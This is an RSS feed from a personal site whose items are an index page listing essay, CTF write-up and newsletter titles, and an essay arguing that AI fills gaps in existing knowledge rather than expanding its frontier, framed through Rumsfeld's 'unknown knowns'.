<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
    <channel>
      <title>Delphi Foresight Strategy</title>
      <link>https://remarks.delphi-strategy.com</link>
      <description>Last 10 notes on Delphi Foresight Strategy</description>
      <generator>Quartz -- quartz.jzhao.xyz</generator>
      <item>
    <title>Delphi Foresight Strategy</title>
    <link>https://remarks.delphi-strategy.com/</link>
    <guid>https://remarks.delphi-strategy.com/</guid>
    <description><![CDATA[ &lt;p&gt;&lt;img src=&quot;https://remarks.delphi-strategy.com/assets/4b03500aecf3b15db687105445db63fe.jpg&quot; alt=&quot;Delphi Foresight Strategy&quot; width=&quot;auto&quot; height=&quot;auto&quot; loading=&quot;lazy&quot;&gt;&lt;/p&gt;
&lt;center&gt;&lt;em&gt;Viable futures through reasoned thought&lt;/em&gt;&lt;/center&gt;
&lt;h2 id=&quot;essays&quot;&gt;Essays&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#essays&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Various essays, mostly thinking about society and the future.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;2012 Sep 12&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2012-09-12&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2012-09-12&quot;&gt;The Clarke Horizon (part 1)&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2012 Sep 13&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2012-09-13&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2012-09-13&quot;&gt;The Clarke Horizon (part 2)&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2013 Oct 06&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2013-10-06&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2013-10-06&quot;&gt;The transparent society&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2013 Oct 20&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2013-10-20&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2013-10-20&quot;&gt;Unknown knowns&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Jun 21&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2016-06-21&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2016-06-21&quot;&gt;The Kobayashi Maru&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Jun 22&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2016-06-22&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2016-06-22&quot;&gt;The Prime Directive&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Sep 05&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2016-09-05&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2016-09-05&quot;&gt;Te Urewera&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Oct 08&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2016-10-08&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2016-10-08&quot;&gt;The challenge of a post-scarcity transition&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Jan 07&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2018-01-07&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2018-01-07&quot;&gt;A hierarchy of needs for belief systems&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Jun 23&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2018-06-23&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2018-06-23&quot;&gt;The Kobayashi Maru (redux)&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Aug 15&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2022-08-15&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2022-08-15&quot;&gt;Notes from HOPE and DEF CON&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Nov 27&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2022-11-27&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2022-11-27&quot;&gt;Trying (and failing) to deploy a smart contract using an iPad Pro&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2024 Jan 24&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/essays/2024-01-24&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;essays/2024-01-24&quot;&gt;It’s time to explore&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;ctf-write-ups&quot;&gt;CTF write-ups&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#ctf-write-ups&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;I also work in &lt;a href=&quot;https://cardboard-iguana.com&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;computer security&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, and occasionally write up the CTFs I’ve worked through. Don’t read these unless you get stuck yourself!&lt;/p&gt;
&lt;p&gt;&lt;code&gt;2020 Jul 27&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2020-07-27&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2020-07-27&quot;&gt;Bandit&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Oct 10&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-10-10&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-10-10&quot;&gt;Pickle Rick&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Nov 04&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-11-04&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-11-04&quot;&gt;Basic pentesting&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Dec 07&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-12-07&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-12-07&quot;&gt;Ice&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Dec 08&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-12-08&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-12-08&quot;&gt;Blaster&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Dec 14&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-12-14&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-12-14&quot;&gt;Overpass 2: Hacked&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2021 Dec 30&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2021-12-30&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2021-12-30&quot;&gt;Attacktive Directory&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Jan 02&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2022-01-02&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2022-01-02&quot;&gt;Retro&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Jan 30&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2022-01-30&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2022-01-30&quot;&gt;Tools’R’us&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Feb 01&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2022-02-01&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2022-02-01&quot;&gt;Inclusion&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Feb 02&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2022-02-02&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2022-02-02&quot;&gt;Jurassic Park&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2022 Apr 03&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2022-04-03&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2022-04-03&quot;&gt;Net sec challenge&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2023 Apr 27&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/ctfs/2023-04-27&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;ctfs/2023-04-27&quot;&gt;Union&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;newsletters&quot;&gt;Newsletters&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#newsletters&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Archives of the short-lived &lt;em&gt;Five Futures&lt;/em&gt; newsletter.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;2016 Aug 09&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-08-09&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-08-09&quot;&gt;Camp Century&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Aug 15&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-08-15&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-08-15&quot;&gt;A slow rate of reproduction&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Aug 21&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-08-21&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-08-21&quot;&gt;I’m not saying it’s aliens…&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Sep 06&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-09-06&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-09-06&quot;&gt;A matter of intense but mostly theoretical debate&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Sep 19&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-09-19&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-09-19&quot;&gt;Enough behavioral flexibility to persist in a disturbed landscape&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Oct 01&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-10-01&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-10-01&quot;&gt;When the sea came in and covered the land&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Oct 17&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-10-17&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-10-17&quot;&gt;Pervasive and obligatory features&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2016 Dec 18&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2016-12-18&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2016-12-18&quot;&gt;And we will know him for a thousand years&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Jan 14&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-01-14&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-01-14&quot;&gt;An Error of Scale&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Jan 20&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-01-20&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-01-20&quot;&gt;Everything was stripped away&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Jan 28&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-01-28&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-01-28&quot;&gt;The last remaining hominin&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Feb 11&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-02-11&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-02-11&quot;&gt;Surprise must hide in secret worlds&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Feb 18&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-02-18&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-02-18&quot;&gt;Something of adaptive value to human life&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Sep 23&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-09-23&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-09-23&quot;&gt;Where Homo sapiens is headed&lt;/a&gt;&lt;br&gt;
&lt;code&gt;2018 Oct 03&lt;/code&gt; | &lt;a href=&quot;https://remarks.delphi-strategy.com/newsletters/2018-10-03&quot; class=&quot;internal internal-link alias&quot; data-slug=&quot;newsletters/2018-10-03&quot;&gt;Other decisions can be made&lt;/a&gt;&lt;/p&gt; ]]></description>
    <pubDate>Sun, 16 Aug 2026 18:09:06 GMT</pubDate>
  </item><item>
    <title>It&#039;s time to explore</title>
    <link>https://remarks.delphi-strategy.com/essays/2024-01-24</link>
    <guid>https://remarks.delphi-strategy.com/essays/2024-01-24</guid>
    <description><![CDATA[ &lt;h1 id=&quot;its-time-to-explore&quot;&gt;It’s time to explore&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#its-time-to-explore&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;The below is a lightly edited version of a thread I posted on &lt;a href=&quot;https://warpcast.com/necopinus.eth/0xd134c2fc&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Farcaster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, &lt;a href=&quot;https://bsky.app/profile/necopinus.xyz/post/3kjnsx7bqg62f&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Bluesky&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, and &lt;a href=&quot;https://twitter.com/necopinus/status/1749808993344880966&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Twitter&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href=&quot;https://venkateshrao.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Venkatesh Rao&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;’s formulation of AI as “a camera, not an engine” turns out to not just be an interesting perspective, but to finally fill in the “unknown knowns” quadrant of &lt;a href=&quot;https://en.wikipedia.org/wiki/Donald_Rumsfeld&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Donald Rumsfeld&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;’s (in)famous 2x2 in a satisfying way.&lt;/p&gt;
&lt;p&gt;For those who don’t remember, during a 2002 press conference on the eve of the &lt;a href=&quot;https://en.wikipedia.org/wiki/Iraq_War&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Iraq War&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; &lt;a href=&quot;https://wikipedia.org/wiki/There_are_unknown_unknowns&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Rumsfeld said&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;”… [A]s we know, there are known knowns; there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns - the ones we don’t know we don’t know.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Rumsfeld is setting up a rather unusual 2x2 here, where &lt;em&gt;both&lt;/em&gt; axis are “things we know”. But 2x2s have four quadrants, and Rumsfeld only describes three of them. A description of “unknown knowns” is missing.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Slavoj_%C5%BDi%C5%BEek&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Slavoj Žižek&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; later tried to fill in the “unknown knowns” quadrant by postulating that it was &lt;a href=&quot;https://www.lacan.com/zizekrumsfeld.htm&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;knowledge that is widely understood but only at a sort of “subconscious” level&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, as truly surfacing that knowledge would be too destructive to the ego / status quo. I’ve always found Žižek’s formulation unsatisfying, however. What Žižek is talking about is a sort of willful ignorance, while Rumsfeld’s stated cases revolve around &lt;em&gt;actually not knowing&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;So where does Rao’s work fit into this? Well, in &lt;a href=&quot;https://studio.ribbonfarm.com/p/a-camera-not-an-engine&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;“A Camera, Not an Engine”&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, Rao reformulates AI not as a tool for expanding the frontier of knowledge, but rather a way to fill in voids that exist in the space of things we already know. AI is “discovering” the thoughts / ideas / knowledge that is implied by existing thoughts / ideas / knowledge. “Filling in the blanks” in our existing knowledge space.&lt;/p&gt;
&lt;p&gt;Importantly, it’s &lt;em&gt;not&lt;/em&gt; actually &lt;em&gt;expanding&lt;/em&gt; the frontier of knowledge. After all, how could it? Even with access to the entire Internet, AIs are still “a ship in a bottle”, capable only of sailing the seas or thoughts humans have already recorded in some way.&lt;/p&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
                  &lt;div class=&quot;callout-title-inner&quot;&gt;&lt;p&gt;Note&lt;/p&gt;&lt;/div&gt;
                  
                &lt;/div&gt;
&lt;div class=&quot;callout-content&quot;&gt;
&lt;p&gt;A “discovery” made by an AI is more like a “discovery” in mathematics than a discovery in the physical sciences. Self-contained logical systems are not like the human world, which is a porous, unclear, and - for any one person - finite realm.&lt;/p&gt;
&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;I think this train of reasoning has something interesting to say about science in the age of AI.&lt;/p&gt;
&lt;p&gt;There’s been a lot of excitement about using AI to discover new materials or as a tool for hypothesis generation. But really what’s happening is that AI is finding &lt;em&gt;new angles on known data sets&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Now, finding new angles on old data is important! One of the things that we’re rapidly learning is that there’s &lt;em&gt;a lot&lt;/em&gt; of latent space in human knowledge. And filling in that space is going to bring &lt;em&gt;a lot&lt;/em&gt; of benefits.&lt;/p&gt;
&lt;p&gt;But it’s also, in a very real way, all low-hanging fruit.&lt;/p&gt;
&lt;p&gt;I suspect that what we’re going to find is that AI is going to make weird science moonshots - things that can’t really involve AI, because they’re looking for truly &lt;em&gt;new&lt;/em&gt; things - more important. Weird moonshots are how we expand the frontiers of human thinking. AI will be, more and more, how we fill in the space &lt;em&gt;behind&lt;/em&gt; that frontier.&lt;/p&gt;
&lt;p&gt;This is going to make science &lt;em&gt;much&lt;/em&gt; more exciting (amazing, horrifying, wonderful new things!), but also &lt;em&gt;a lot&lt;/em&gt; less efficient (most moonshots fail, and most weird ideas come from the minds of crackpots). But this also represents an almost 180° reversal as to how we increasingly handle basic research. Over the course of my lifetime (and stretching before), we’ve come to focus more and more on research that is obviously &lt;em&gt;applicable&lt;/em&gt; in some way. But “applicable” research is by definition research behind the frontiers. This is what AI’s going to first accelerate, and then cannibalize.&lt;/p&gt;
&lt;p&gt;What’s going to make this even harder is that in the short term AI’s going to give us &lt;em&gt;a lot&lt;/em&gt; of returns by filling in the gaps in the explored space of human knowledge - turning our “unknown knowns” into “known knowns”. So for a while it’s going to look like we don’t &lt;em&gt;need&lt;/em&gt; as many weird moonshots or out-there exploration, because the returns from using AI to fill in the existant latent space will be so large. It will &lt;em&gt;feel&lt;/em&gt; like we’re learning a lot (and in a sense, we will be). But we will &lt;em&gt;not&lt;/em&gt; be expanding what is fundamentally a finite explored realm of human ideas and knowledge. If we don’t start seriously investing in expanding that frontier, we’re going to get &lt;em&gt;stuck&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;What does expanding the frontier of human ideas an knowledge look like? Well, close to the frontier, it’s the process of turning “known unknowns” into “known knowns”. But even more important will be true &lt;em&gt;exploration&lt;/em&gt; - the process of turning “unknown unknowns” into “known unknowns”. It is only these two processes that actually &lt;em&gt;expand&lt;/em&gt; the frontiers of human ideas and knowledge.&lt;/p&gt;
